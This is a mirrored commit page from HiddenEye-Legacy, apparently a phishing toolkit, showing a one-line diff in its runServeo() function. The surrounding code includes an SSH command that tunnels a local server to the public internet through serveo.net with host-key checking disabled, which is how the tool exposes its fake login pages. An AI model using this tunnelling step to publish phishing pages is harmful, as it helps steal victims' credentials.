mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update HiddenEye.py
This commit is contained in:
parent
5ab1fe573b
commit
a1317e7cd4
|
@ -274,7 +274,6 @@ def runPEnv(): #menu where user select what they wanna use
|
|||
|
||||
|
||||
def runServeo():
|
||||
system('rm link.url 2> /dev/null')
|
||||
system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null &')
|
||||
sleep(7)
|
||||
with open('link.url') as creds:
|
||||
|
|
Loading…
Reference in New Issue
Block a user